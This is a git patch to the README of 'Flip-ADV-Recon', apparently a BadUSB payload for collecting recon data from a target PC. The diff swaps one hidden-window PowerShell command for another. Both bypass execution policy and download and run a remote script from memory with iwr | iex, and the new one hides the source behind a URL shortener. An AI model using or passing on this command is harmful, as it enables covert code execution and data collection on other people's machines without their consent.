From 0fa94af3e5b5311dd3c22b85ad3b04c9333de55c Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sat, 17 Dec 2022 22:51:12 -0600 Subject: [PATCH] Update README.md --- Payloads/Flip-ADV-Recon/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-ADV-Recon/README.md b/Payloads/Flip-ADV-Recon/README.md index efece30..547e64f 100644 --- a/Payloads/Flip-ADV-Recon/README.md +++ b/Payloads/Flip-ADV-Recon/README.md @@ -56,7 +56,7 @@ This program enumerates a target PC to collect as much recon data as possible fo * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory ``` -powershell -w h -NoP -NonI -Ep Bypass $db='';iwr https://raw.githubusercontent.com/I-Am-Jakoby/1/main/ADV-Recon.ps1 | iex +powershell -w h -NoP -NonI -Ep Bypass $db='';iwr rebrand.ly/9eegqdd | iex ```

(back to top)